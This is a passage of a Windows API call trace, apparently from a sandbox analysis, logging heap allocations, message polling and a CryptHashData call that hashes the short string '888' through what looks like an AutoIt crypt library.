wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0220.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0220.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0220.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0220.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0220.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0220.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0220.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0220.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0220.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0220.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0220.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f68 [0220.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0220.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0220.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0220.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0220.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55058, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0220.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0220.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0220.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0220.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0220.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0220.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0220.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0220.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0220.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0220.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0220.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0220.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0220.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0220.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0220.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0220.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0220.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0220.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0220.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0220.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0220.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0220.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0220.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0220.391] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0220.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0220.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0220.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0220.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0220.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0220.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0220.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0220.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0220.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0220.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0220.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f48 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0220.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0220.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0220.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0220.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0220.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0220.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0220.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0220.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0220.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0220.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0220.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0220.393] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0220.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0220.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0220.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0220.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0220.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0220.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0220.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0220.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0220.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0220.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0220.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0220.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0220.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0220.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0220.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54fb8 [0220.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0220.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0220.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0220.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0220.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54f68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0220.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0220.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0220.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0220.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0220.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0220.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55048 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0220.395] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0220.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0220.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0220.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0220.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0220.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0220.395] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043f0 | out: hHeap=0x970000) returned 1 [0220.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0220.395] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0220.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0220.396] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0220.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0220.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0220.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0220.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0220.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0220.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0220.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0220.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0220.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0220.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0220.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0220.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0220.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0220.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0220.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0220.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0220.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0220.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0220.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0220.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51508, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0220.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0220.397] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0220.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0220.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.397] CryptHashData (hHash=0xa87110, pbData=0x2e54f48, dwDataLen=0x3, dwFlags=0x1) returned 1 [0220.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0220.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0220.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0220.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0220.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0220.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0220.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0220.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0220.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0220.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0220.398] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0220.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0220.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0220.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0220.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0220.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0220.398] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0220.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0220.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0220.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0220.399] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0220.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0220.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0220.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0220.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0220.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0220.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0220.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0220.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0220.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0220.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0220.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0220.400] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0220.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0220.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0220.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0220.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0220.400] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0220.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0220.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0220.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0220.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0220.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0220.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0220.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0220.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0220.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0220.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0220.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0220.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0220.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0220.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0220.400] 